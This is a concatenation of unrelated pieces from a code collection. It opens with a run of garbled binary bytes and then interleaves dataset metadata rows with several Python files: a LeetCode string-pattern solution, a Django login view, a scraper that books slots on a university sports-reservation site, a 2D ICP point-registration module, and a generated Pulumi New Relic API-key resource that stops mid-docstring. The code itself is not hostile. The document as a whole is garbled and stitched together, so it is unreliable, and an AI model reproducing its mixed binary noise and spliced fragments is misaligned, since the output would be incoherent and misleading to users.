\xc2\xa34\xd23\xb8\xf8\x1d-\x8a\'^\x08\x19\x18\x92\xa4k\x82!6\x8a~\x0f\x12!Kg\xa4\xd3\x02%,\xb7\x9d=\xca\xa2B\'\x99{B3$\xb3$\xca\xd72\xa8!Z\x15H\x93(\x94Qn\xfa/\x02\x97\x1b\x9c\xd29\xbda%\xa4\x93{\xf5\x81\xa6\xc4\xd7#m1\x14D\xc0}E\xe2y\x83\xd2 C\x00)z\x9a t1\x81`\xb8"\x92\xd3=o\x1a\x18\x86\xfa\xa6z\xba\x8a\xaa\xc7\x1d\x19\x12\xa5\xbd\xa1#\x81#\xa7\x1bY+\xe2\xa7(\x89\x11\x18\xb9\x02\xa9\x83\xb1%z\xfa-\xe6\x00\x82\xff\x0b9A\xe8\x81\x17\xe3\xa12\t\xb3%\xc4\x02\x82\xb4\xca\x18 (\x18M\x01(\x87\x11o\xbdB3V\x11#\xafJ\x1a)\x13\'Q\xd1\x7f#\xa4\x7f\xda\xa7\x16\xbd*/gs\xaa\xb8*/\xdb\xe8~\xbaz)\xcc\xda\x16\xbc\xea\x8c\x02x.\x17hn\xb1b,\xba\xda>\x8c\xc1{\x1bH<[\xd2\xac\xcei\xa1v%p\xe3\x01=MX%\x12\x90C\xb4:7\xc22\xaf\x87\xca\x9a\x1e\x08\x18f\xc8,\x18\xa8\x84=\xf2\xaf\xedjn\x84\xe3\x81\xa4c\x86\x8f\xa10<3S\x9c",\xfbz4 s\xaa\x89b6\xbe\x08*K(\x18\x0b;\x1e[\x88\x1b\x17\xba8K\x18\xa5mQ.\x83\x81u&#\xae\xb2\x12\x83Kh\xae{\xd1\xb0\xe9J\x0e\x17z 
| 8,017.25 | 26,043 | 0.732234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 32,038 | 0.999033 |
1faa1a1b78082931266633b4320d81cdfa0d54a0
| 1,342 |
py
|
Python
|
python/repeated_substring_pattern.py
|
shub0/leetcode
|
8221d10f201d001abcb15b27c9cf4b8cd5060f1f
|
[
"BSD-3-Clause"
] | null | null | null |
python/repeated_substring_pattern.py
|
shub0/leetcode
|
8221d10f201d001abcb15b27c9cf4b8cd5060f1f
|
[
"BSD-3-Clause"
] | null | null | null |
python/repeated_substring_pattern.py
|
shub0/leetcode
|
8221d10f201d001abcb15b27c9cf4b8cd5060f1f
|
[
"BSD-3-Clause"
] | null | null | null |
'''
Given a non-empty string, check if it can be constructed by taking a substring of it and appending multiple copies of the substring together. You may assume the given string consists of lowercase English letters only and its length will not exceed 10000.
Example 1:
Input: "abab"
Output: True
Explanation: It's the substring "ab" twice.
Example 2:
Input: "aba"
Output: False
Example 3:
Input: "abcabcabcabc"
Output: True
Explanation: It's the substring "abc" four times. (And the substring "abcabc" twice.)
'''
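# The problem above asks whether s is one block repeated at least twice.
# As an illustrative alternative (not part of the original solution), the
# well-known "doubling" check below answers the same question: a string is
# periodic exactly when it reappears inside (s + s) with its first and last
# characters removed. The helper name is introduced here for illustration.
def repeated_substring_pattern_doubling(s):
    return len(s) > 1 and s in (s + s)[1:-1]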
class Solution(object):
    def aux(self, nums):
        # yield every common divisor (>= 2) of the character counts
        for denom in range(2, min(nums) + 1):
            if all(num % denom == 0 for num in nums):
                yield denom
    def repeatedSubstringPattern(self, s):
        """
        :type s: str
        :rtype: bool
        """
        import collections
        size = len(s)
        if size < 2:
            return False
        freq = collections.Counter(s)
        # the repeat count must divide every character count, so it suffices
        # to test each common divisor of the counts as a candidate repeat count
        for denom in self.aux(freq.values()):
            if s[:size // denom] * denom == s:
                return True
        return False
solution = Solution()
print(solution.repeatedSubstringPattern("abab"))        # True
print(solution.repeatedSubstringPattern("ababab"))      # True
print(solution.repeatedSubstringPattern("aba"))         # False
print(solution.repeatedSubstringPattern("abaababaab"))  # True
| 26.84 | 253 | 0.655738 | 598 | 0.445604 | 0 | 0 | 0 | 0 | 0 | 0 | 607 | 0.45231 |
1faa329bdcdfd3ec7bf7b728a50094b19a036130
| 162 |
py
|
Python
|
all_auto_test/users/views.py
|
Evading77/all_auto_testing_eva
|
81fe4732a686327084701be1ef9cf5850e7d78d8
|
[
"MIT"
] | null | null | null |
all_auto_test/users/views.py
|
Evading77/all_auto_testing_eva
|
81fe4732a686327084701be1ef9cf5850e7d78d8
|
[
"MIT"
] | null | null | null |
all_auto_test/users/views.py
|
Evading77/all_auto_testing_eva
|
81fe4732a686327084701be1ef9cf5850e7d78d8
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.views import View
class LoginView(View):
def get(self,request):
return render(request,'login.html')
| 20.25 | 43 | 0.734568 | 93 | 0.574074 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | 0.074074 |
1fac74b876540807e88381140691e44fb1871829
| 6,417 |
py
|
Python
|
src/webinterface.py
|
Wassasin/vrijbrief
|
de081395c651e73a436662bfe09f4542e0ca27c7
|
[
"MIT"
] | null | null | null |
src/webinterface.py
|
Wassasin/vrijbrief
|
de081395c651e73a436662bfe09f4542e0ca27c7
|
[
"MIT"
] | 1 |
2015-02-07T23:36:13.000Z
|
2015-02-07T23:36:13.000Z
|
src/webinterface.py
|
Wassasin/vrijbrief
|
de081395c651e73a436662bfe09f4542e0ca27c7
|
[
"MIT"
] | 2 |
2015-02-07T20:01:18.000Z
|
2021-05-13T13:21:11.000Z
|
import browser
import re
import datetime
from bs4 import BeautifulSoup, NavigableString
RX_OCCUPATION = re.compile(r"([0-9]+)/([0-9]+)")
RX_TIME = re.compile(r"([0-9]{2}:[0-9]{2})-([0-9]{2}:[0-9]{2})")
RX_FULLDATE = re.compile(r"[a-z]{2} ([0-9]{2}) ([a-z]{3}) ([0-9]{4})")
MONTHS = ["jan", "feb", "maa", "apr", "mei", "jun", "jul", "aug", "sep", "okt", "nov", "dec"]
class AuthenticationFailure(Exception):
pass
class Webinterface:
def login(self, mode=None):
# Prime session
self.b.open_url("https://publiek.usc.ru.nl/publiek/login.php")
# Submit mode
body = self.b.open_url("https://publiek.usc.ru.nl/publiek/login.php", [("PRESET[Login][login_groep][]", self.mode)])
# Submit login form
self.b.open_url("https://publiek.usc.ru.nl/publiek/login.php",
[("username", self.username), ("password", self.password)])
# Open main page; check if login was successful
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/")
soup = BeautifulSoup(body)
if soup.find("a", href="logout.php") is None:
raise AuthenticationFailure
print "Logged in successfully as '%s'" % soup.find("div", "pullrightfooterinfo").string.strip()
pass
def __init__(self, username, password, mode='S_RU'):
self.username = username
self.password = password
self.mode = mode
self.b = browser.Browser("Vrijbrief/0.1")
self.login()
pass
def parseDate(self, date):
matched = RX_FULLDATE.match(date)
d, mstr, y = matched.groups()
m = MONTHS.index(mstr)+1
return datetime.date(int(y), int(m), int(d))
def listCategories(self):
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/laanbod.php")
soup = BeautifulSoup(body, "html5lib")
groups = soup.find("form", id="target")
current_series = None
for tr in groups.children:
if type(tr) is NavigableString:
continue
elif tr.has_attr('class') and "list-group-item-heading" in tr["class"]:
current_series = tr.find("b").get_text().strip()
elif tr.name == "label":
assert current_series is not None
inputradio = tr.find("input")
assert inputradio["name"] == "PRESET[Laanbod][inschrijving_id_pool_id][]"
value = inputradio["value"]
pool = tr.find('i').get_text().strip()
yield value, current_series, pool
def listEntries(self, catId):
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/laanbod.php", [("PRESET[Laanbod][inschrijving_id_pool_id][]", catId)])
soup = BeautifulSoup(body)
groups = soup.find("table", class_="responstable clickabletr")
for tr in groups.find_all("tr"):
if not tr.has_attr("class") or "clickabletr" not in tr["class"]:
continue
fields = tr.find_all("td")
date = fields[0].get_text().strip()
time = fields[1].get_text().strip()
accesskey = fields[2].a["href"]
occupation = fields[3].get_text().strip()
availability = 0
if occupation != "VOL":
occupation_matched = RX_OCCUPATION.match(occupation)
assert occupation_matched
availability = int(occupation_matched.groups()[1]) - int(occupation_matched.groups()[0])
time_matched = RX_TIME.match(time)
assert(time_matched)
startTime, endTime = time_matched.groups()
date = self.parseDate(date)
yield date, startTime, endTime, availability, accesskey
pass
def addEntry(self, accesskey):
# View entry page
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/" + accesskey)
soup = BeautifulSoup(body)
a = soup.find("a", class_="btn btn-responsive btn-success pull-right")
assert(a.get_text().strip() == "Toevoegen aan Keuzelijst")
# Press on add-button
confirmkey = a["href"]
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/" + confirmkey)
pass
def confirm(self):
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/bevestigen.php",
[("actie", "bevestig"), ("tabel", "klant"), ("kolom", "klant_id"), ("waarde", self.username)])
# Confirming logs you out; thus we need to log back in
self.login()
pass
def listReservations(self):
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/overzicht.php")
soup = BeautifulSoup(body)
reservations_label = soup.find(text="Reserveringen Locaties")
if reservations_label is None:
return
thr = list(reservations_label.parents)[3]
assert thr.name == "tr"
for tr in thr.find_next_siblings("tr"):
fields = tr.find_all("td")
accesskey = fields[0].a["href"]
pool = fields[1].get_text().strip()
date = fields[2].get_text().strip()
time = fields[3].get_text().strip()
time_matched = RX_TIME.match(time)
assert(time_matched)
startTime, endTime = time_matched.groups()
date = self.parseDate(date)
yield pool, date, startTime, endTime, accesskey
pass
def killReservation(self, accesskey):
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/" + accesskey)
soup = BeautifulSoup(body)
linschrijving_id = soup.find("input", attrs={"name": "linschrijving_id"})["value"]
self.b.open_url("https://publiek.usc.ru.nl/publiek/" + accesskey,
[("linschrijving_id", linschrijving_id), ("actie", "bevestig"), ("tabel", "klant"), ("kolom", "klant_id"), ("waarde", self.username)])
print "Killed %s" % linschrijving_id
pass
| 38.196429 | 158 | 0.555244 | 6,041 | 0.941406 | 3,140 | 0.489325 | 0 | 0 | 0 | 0 | 1,566 | 0.244039 |
1fb09b5991e8d87644d6f495740d136659baa06e
| 10,805 |
py
|
Python
|
scar_core/scripts/icp.py
|
yycho0108/SSAM
|
8b93f84cb162e475231e1de29360e6c6f1632363
|
[
"MIT"
] | null | null | null |
scar_core/scripts/icp.py
|
yycho0108/SSAM
|
8b93f84cb162e475231e1de29360e6c6f1632363
|
[
"MIT"
] | null | null | null |
scar_core/scripts/icp.py
|
yycho0108/SSAM
|
8b93f84cb162e475231e1de29360e6c6f1632363
|
[
"MIT"
] | null | null | null |
import numpy as np
from sklearn.neighbors import NearestNeighbors
import cv2
def estimate_normals(p, k=20):
neigh = NearestNeighbors(n_neighbors=k)
neigh.fit(p)
distances, indices = neigh.kneighbors(return_distance=True)
dp = (p[indices] - p[:,None])
U, s, V = np.linalg.svd(dp.transpose(0,2,1))
nv = U[:, :, -1]
    return nv / np.linalg.norm(nv, axis=1, keepdims=True)  # normalize each row to a unit normal
def test_norm():
np.random.seed(3)
from matplotlib import pyplot as plt
pt_map = np.concatenate([get_line(n=33, s=1.0) for _ in range(3)], axis=0)
pt_map = np.random.normal(loc=pt_map, scale=0.05)
nv = estimate_normals(pt_map)
plt.plot(pt_map[:,0], pt_map[:,1], '.', label='map')
plt.quiver(
pt_map[:,0], pt_map[:,1],
nv[:,0], nv[:,1],
scale_units='xy',
angles='xy'
)
plt.gca().set_aspect('equal', 'datalim')
plt.legend()
plt.show()
def stable_subsample(p):
"""
Geometrically Stable ICP Subsampling with constraints analysis
Gelfand et al. 2003
http://www.people.vcu.edu/~dbandyop/pubh8472/Gelfand_SVC.pdf
https://graphics.stanford.edu/papers/stabicp/stabicp.pdf
"""
# TODO : implement
pass
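# A minimal sketch of the stability-based subsampling that the docstring of
# stable_subsample() above refers to (Gelfand et al. 2003). This is not the
# paper's exact algorithm: it simply builds the 2D point-to-plane constraint
# rows [cross(p, n), nx, ny], finds the least-constrained eigen-direction of
# their covariance, and keeps the points that constrain it best. The function
# name and the k_keep parameter are assumptions introduced for illustration.
def stable_subsample_sketch(p, k_keep=100):
    n = estimate_normals(p)
    f = np.concatenate([np.cross(p, n)[:, None], n], axis=1)  # (N, 3) constraint rows
    c = f.T.dot(f)                    # 3x3 constraint covariance
    w, v = np.linalg.eigh(c)          # eigenvalues in ascending order
    weakest = v[:, 0]                 # least-constrained direction
    score = np.abs(f.dot(weakest))    # how strongly each point pins that direction
    keep = np.argsort(score)[::-1][:k_keep]
    return p[keep]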
class ICP():
def __init__(self):
pass
@staticmethod
def best_fit_transform(A, B):
'''
Calculates the least-squares best-fit transform that maps corresponding points A to B in m spatial dimensions
Input:
A: Naxm numpy array of corresponding points
B: Nbxm numpy array of corresponding points
Returns:
T: (m+1)x(m+1) homogeneous transformation matrix that maps A on to B
R: mxm rotation matrix
t: mx1 translation vector
'''
# assert A.shape == B.shape
# get number of dimensions
m = A.shape[1]
# translate points to their centroids
centroid_A = np.mean(A, axis=0)
centroid_B = np.mean(B, axis=0)
AA = A - centroid_A
BB = B - centroid_B
# rotation matrix
H = np.dot(AA.T, BB)
U, S, Vt = np.linalg.svd(H)
R = np.dot(Vt.T, U.T)
# special reflection case
if np.linalg.det(R) < 0:
Vt[m-1,:] *= -1
R = np.dot(Vt.T, U.T)
# translation
t = centroid_B.T - np.dot(R,centroid_A.T)
# homogeneous transformation
T = np.identity(m+1)
T[:m, :m] = R
T[:m, m] = t
return T, R, t
@staticmethod
def best_fit_transform_point_to_plane(src, dst):
# TODO : generalize to N-d cases?
# TODO : use neighborhood from prior computations?
nvec = estimate_normals(dst, k=20)
# construct according to
# https://gfx.cs.princeton.edu/proj/iccv05_course/iccv05_icp_gr.pdf
A_lhs = np.cross(src, nvec)[:,None]
A_rhs = nvec
Amat = np.concatenate([A_lhs, A_rhs], axis=1) # == Nx3
# == Experimental : Stability Analysis ==
#C = Amat.T.dot(Amat) # 3x3 cov-mat
#w,v = np.linalg.eig(C)
##c = w[0] / w[-1] # stability
#c = w[-1]
##print('w[-1] : {}'.format(w[-1]))
c = None
# =======================================
bvec = - ((src - dst)*(nvec)).sum(axis=-1)
tvec = np.linalg.pinv(Amat).dot(bvec) # == (dh, dx, dy)
R = Rmat( tvec[0] )
t = tvec[1:]
T = np.eye(3, dtype=np.float32)
T[:2, :2] = R
T[:2, 2] = t
return T, R, t, c
@staticmethod
def nearest_neighbor(src, dst):
'''
Find the nearest (Euclidean) neighbor in dst for each point in src
Input:
src: Naxm array of points
dst: Nbxm array of points
Output:
distances: Euclidean distances of the nearest neighbor
indices: dst indices of the nearest neighbor
'''
assert src.shape[1:] == dst.shape[1:]
neigh = NearestNeighbors(n_neighbors=1)
neigh.fit(dst)
distances, indices = neigh.kneighbors(src, return_distance=True)
return distances.ravel(), indices.ravel()
@staticmethod
def projected_neighbor(src, dst, origin):
"""
index-matching correspondences, according to Blais and Levine, '95
https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=400574
"""
# TODO : implement
pass
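    # A minimal sketch of the projection-based matching that the docstring of
    # projected_neighbor() above refers to (Blais and Levine, '95): instead of
    # a nearest-neighbour search, every source point is matched to the
    # destination point with the closest bearing angle around the sensor
    # origin. This is an illustration under that assumption (no wrap-around
    # handling), not the paper's exact formulation; the method name is new.
    @staticmethod
    def projected_neighbor_sketch(src, dst, origin):
        ang_dst = np.arctan2(dst[:, 1] - origin[1], dst[:, 0] - origin[0])
        ang_src = np.arctan2(src[:, 1] - origin[1], src[:, 0] - origin[0])
        order = np.argsort(ang_dst)
        pos = np.searchsorted(ang_dst[order], ang_src)  # nearest bearing at or above
        pos = np.clip(pos, 0, len(order) - 1)
        indices = order[pos]
        distances = np.linalg.norm(dst[indices] - src, axis=-1)
        return distances, indices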
@staticmethod
def icp(A, B, init_pose=None, max_iterations=20, tolerance=0.001):
'''
The Iterative Closest Point method: finds best-fit transform that maps points A on to points B
Input:
A: Naxm numpy array of source mD points
B: Nbxm numpy array of destination mD point
init_pose: (m+1)x(m+1) homogeneous transformation
max_iterations: exit algorithm after max_iterations
tolerance: convergence criteria
Output:
T: final homogeneous transformation that maps A on to B, T.A = B
distances: Euclidean distances (errors) of the nearest neighbor
i: number of iterations to converge
'''
# assert A.shape == B.shape
# get number of dimensions
ndim = A.shape[1]
nA, nB = A.shape[0], B.shape[0]
assert(A.shape[1:] == B.shape[1:])
# make points homogeneous, copy them to maintain the originals
src = np.ones((nA,ndim+1), dtype=np.float32)
dst = np.ones((nB,ndim+1), dtype=np.float32)
src[:, :ndim] = A
dst[:, :ndim] = B
# apply the initial pose estimation
if init_pose is not None:
src = np.dot(init_pose, src)
prev_error = 0
for i in range(max_iterations):
# find the nearest neighbors between the current source and destination points
distances, indices = ICP.nearest_neighbor(src[:,:-1], dst[:,:-1])
# compute the transformation between the current source and nearest destination points
#T,_,_ = ICP.best_fit_transform(src[:,:-1], dst[indices,:-1])
T,_,_,_ = ICP.best_fit_transform_point_to_plane(src[:,:-1], dst[indices,:-1])
src = np.dot(src,T.T) # right-multiply transform matrix
# check error
mean_error = np.mean(distances)
if np.abs(prev_error - mean_error) < tolerance:
break
prev_error = mean_error
# calculate final transformation
#T,_,_ = ICP.best_fit_transform(A, src[:,:-1])
T,_,_,c = ICP.best_fit_transform_point_to_plane(A, src[:,:-1])
#print('stability : {}'.format(c))
# reprojection-error based filter
# (i.e. without RANSAC)
# TODO : this is probably faster, but does performance degrade?
delta = np.linalg.norm(dst[indices] - src, axis=-1)
msk = (delta < 0.2)
T3 = None
# alternative - refine transform
# (mostly, compute the mask and validate truth)
# opencv version - RANSAC
# doesn't really do anything
#T3, msk = cv2.estimateAffine2D(
# src[None,:,:-1],
# dst[None,indices,:-1],
# method=cv2.FM_RANSAC,
# ransacReprojThreshold=0.2, # TODO : expose this param
# maxIters=2000,
# confidence=0.9999,
# refineIters=100
# )
ms = msk.sum()
#if ms != msk.size:
# print '{}% = {}/{}'.format(float(ms)/msk.size*100, ms, msk.size)
inlier_ratio = float(ms) / msk.size
#inlier_ratio *= np.float32( c > 3e-2 ) # account for stability
# TODO : is it reasonable to account for stability?
# I think c==3e-2 equates to ~10 deg rotation / 0.17m translation
# not 100% sure about this.
if T3 is not None:
#print 'T3'
#print T[:2] - T3
#if inlier_ratio > 0.75:
# T3 = np.concatenate([T3, [[0,0,1]] ], axis=0)
# T = T.dot(T3)
# TODO : revive? idk
pass
return T, distances, indices, i, inlier_ratio
def Rmat(x):
c,s = np.cos(x), np.sin(x)
R = np.float32([c,-s,s,c]).reshape(2,2)
return R
def get_line(n, s):
# return Nx2 line
t = np.linspace(0, s, n)
pt = np.stack([t, np.zeros_like(t)], axis=-1)
h = np.random.uniform(-np.pi, np.pi)
o = np.random.uniform(-1.0, 1.0)
return pt.dot(Rmat(h).T) + o
def main():
np.random.seed(0)
from matplotlib import pyplot as plt
# parameters
n_size = 100
n_repeat = 100
s_noise = 0.1
pt_map = np.concatenate([get_line(n=33, s=1.0) for _ in range(3)], axis=0)
# get geometric transformation
# scan_{map} -> scan_{base_link}
h = np.random.uniform(-np.pi/4, np.pi/4)
R = Rmat(h)
t = np.random.uniform(-1.0, 1.0, size=(1,2))
T0 = np.eye(3)
T0[:2,:2] = R
T0[:2,2] = t
print ('T (x,y,h) : ({}, {}, {})'.format(t[0,0], t[0,1], h))
errs = []
#n_sub = 20
#n_subs = np.linspace(1, len(pt_map), num=10).astype(np.int32)
n_subs = [50]
for n_sub in n_subs:
print('n_sub = {}'.format(n_sub))
err_i = []
for _ in range(n_repeat):
# subsample
pt_scan = np.copy(pt_map[np.random.choice(pt_map.shape[0], size=n_sub, replace=False)])
# apply transform
pt_scan = pt_scan.dot(R.T) + t
# apply noise
pt_scan = np.random.normal(loc=pt_scan, scale=s_noise)
T, distances, indices, iterations, inl = ICP.icp(pt_scan, pt_map,
tolerance=0.000001)
pt_scan_r = pt_scan.dot(T[:2,:2].T) + T[:2,2].reshape(1,2)
# scan_{base_link} -> scan_{map}
h2 = np.arctan2(T[1,0], T[1,1])
t2 = T[:2,2]
#print ('T_inv (x,y,h) : ({}, {}, {})'.format(t2[0], t2[1], h2))
# compute error metric
#print T0.dot(T)
err_T = T0.dot(T)
dt = err_T[:2,2]
dh = np.arctan2(err_T[1,0], err_T[1,1])
err_i.append(np.abs([dt[0], dt[1], dh]))
#print('err (dx,dy,dh) : ({},{},{})'.format(dt[0],dt[1],dh))
err_i = np.mean(err_i, axis=0)
errs.append(err_i)
plt.plot(pt_map[:,0], pt_map[:,1], '.', label='map')
plt.plot(pt_scan[:,0], pt_scan[:,1], '.', label='scan')
plt.plot(pt_scan_r[:,0], pt_scan_r[:,1], '.', label='scan-T')
plt.legend()
plt.show()
#plt.plot(np.float32(n_subs) / len(pt_map), errs)
#plt.legend(['dx','dy','dh'])
#plt.xlabel('sample ratio')
#plt.ylabel('error')
#plt.title('icp characterization')
#plt.show()
if __name__ == "__main__":
#main()
test_norm()
| 31.686217 | 117 | 0.544563 | 6,945 | 0.642758 | 0 | 0 | 6,866 | 0.635447 | 0 | 0 | 4,551 | 0.421194 |
1fb0d351102592159ee6a917dd248009cd700533
| 20,393 |
py
|
Python
|
sdk/python/pulumi_newrelic/api_access_key.py
|
bob-bins/pulumi-newrelic
|
f8a121fb7d6e6ad979d3ccf72467b9e89769e305
|
[
"ECL-2.0",
"Apache-2.0"
] | 6 |
2019-09-17T20:41:26.000Z
|
2022-01-13T23:54:14.000Z
|
sdk/python/pulumi_newrelic/api_access_key.py
|
bob-bins/pulumi-newrelic
|
f8a121fb7d6e6ad979d3ccf72467b9e89769e305
|
[
"ECL-2.0",
"Apache-2.0"
] | 136 |
2019-04-29T21:34:57.000Z
|
2022-03-30T17:07:03.000Z
|
sdk/python/pulumi_newrelic/api_access_key.py
|
bob-bins/pulumi-newrelic
|
f8a121fb7d6e6ad979d3ccf72467b9e89769e305
|
[
"ECL-2.0",
"Apache-2.0"
] | 3 |
2019-10-05T10:33:59.000Z
|
2021-06-15T16:37:49.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ApiAccessKeyArgs', 'ApiAccessKey']
@pulumi.input_type
class ApiAccessKeyArgs:
def __init__(__self__, *,
account_id: pulumi.Input[int],
key_type: pulumi.Input[str],
ingest_type: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a ApiAccessKey resource.
:param pulumi.Input[int] account_id: The New Relic account ID of the account you wish to create the API access key.
:param pulumi.Input[str] key_type: What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
:param pulumi.Input[str] ingest_type: Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
:param pulumi.Input[str] name: The name of the key.
:param pulumi.Input[str] notes: Any notes about this ingest key.
        :param pulumi.Input[int] user_id: Required if `key_type = USER`. The New Relic user ID you wish to create the API access key for in an account.
"""
pulumi.set(__self__, "account_id", account_id)
pulumi.set(__self__, "key_type", key_type)
if ingest_type is not None:
pulumi.set(__self__, "ingest_type", ingest_type)
if name is not None:
pulumi.set(__self__, "name", name)
if notes is not None:
pulumi.set(__self__, "notes", notes)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> pulumi.Input[int]:
"""
The New Relic account ID of the account you wish to create the API access key.
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: pulumi.Input[int]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter(name="keyType")
def key_type(self) -> pulumi.Input[str]:
"""
What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
"""
return pulumi.get(self, "key_type")
@key_type.setter
def key_type(self, value: pulumi.Input[str]):
pulumi.set(self, "key_type", value)
@property
@pulumi.getter(name="ingestType")
def ingest_type(self) -> Optional[pulumi.Input[str]]:
"""
Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
"""
return pulumi.get(self, "ingest_type")
@ingest_type.setter
def ingest_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ingest_type", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the key.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def notes(self) -> Optional[pulumi.Input[str]]:
"""
Any notes about this ingest key.
"""
return pulumi.get(self, "notes")
@notes.setter
def notes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "notes", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[pulumi.Input[int]]:
"""
        Required if `key_type = USER`. The New Relic user ID you wish to create the API access key for in an account.
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_id", value)
@pulumi.input_type
class _ApiAccessKeyState:
def __init__(__self__, *,
account_id: Optional[pulumi.Input[int]] = None,
ingest_type: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
key_type: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering ApiAccessKey resources.
:param pulumi.Input[int] account_id: The New Relic account ID of the account you wish to create the API access key.
:param pulumi.Input[str] ingest_type: Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
        :param pulumi.Input[str] key: The actual API key. This attribute is masked and will not be visible in your terminal, CI, etc.
:param pulumi.Input[str] key_type: What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
:param pulumi.Input[str] name: The name of the key.
:param pulumi.Input[str] notes: Any notes about this ingest key.
        :param pulumi.Input[int] user_id: Required if `key_type = USER`. The New Relic user ID you wish to create the API access key for in an account.
"""
if account_id is not None:
pulumi.set(__self__, "account_id", account_id)
if ingest_type is not None:
pulumi.set(__self__, "ingest_type", ingest_type)
if key is not None:
pulumi.set(__self__, "key", key)
if key_type is not None:
pulumi.set(__self__, "key_type", key_type)
if name is not None:
pulumi.set(__self__, "name", name)
if notes is not None:
pulumi.set(__self__, "notes", notes)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> Optional[pulumi.Input[int]]:
"""
The New Relic account ID of the account you wish to create the API access key.
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter(name="ingestType")
def ingest_type(self) -> Optional[pulumi.Input[str]]:
"""
Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
"""
return pulumi.get(self, "ingest_type")
@ingest_type.setter
def ingest_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ingest_type", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
        The actual API key. This attribute is masked and will not be visible in your terminal, CI, etc.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="keyType")
def key_type(self) -> Optional[pulumi.Input[str]]:
"""
What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
"""
return pulumi.get(self, "key_type")
@key_type.setter
def key_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_type", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the key.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def notes(self) -> Optional[pulumi.Input[str]]:
"""
Any notes about this ingest key.
"""
return pulumi.get(self, "notes")
@notes.setter
def notes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "notes", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[pulumi.Input[int]]:
"""
        Required if `key_type = USER`. The New Relic user ID you wish to create the API access key for in an account.
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_id", value)
class ApiAccessKey(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[int]] = None,
ingest_type: Optional[pulumi.Input[str]] = None,
key_type: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Use this resource to programmatically create and manage the following types of keys:
- [User API keys](https://docs.newrelic.com/docs/apis/get-started/intro-apis/types-new-relic-api-keys#user-api-key)
- License (or ingest) keys, including:
- General [license key](https://docs.newrelic.com/docs/accounts/install-new-relic/account-setup/license-key) used for APM
- [Browser license key](https://docs.newrelic.com/docs/browser/new-relic-browser/configuration/copy-browser-monitoring-license-key-app-id)
Please visit the New Relic article ['Use NerdGraph to manage license keys and User API keys'](https://docs.newrelic.com/docs/apis/nerdgraph/examples/use-nerdgraph-manage-license-keys-user-keys)
for more information.
> **IMPORTANT!**
Please be very careful when updating existing `ApiAccessKey` resources as only `newrelic_api_access_key.name`
and `newrelic_api_access_key.notes` are updatable. All other resource attributes will force a resource recreation which will
invalidate the previous API key(s).
## Example Usage
```python
import pulumi
import pulumi_newrelic as newrelic
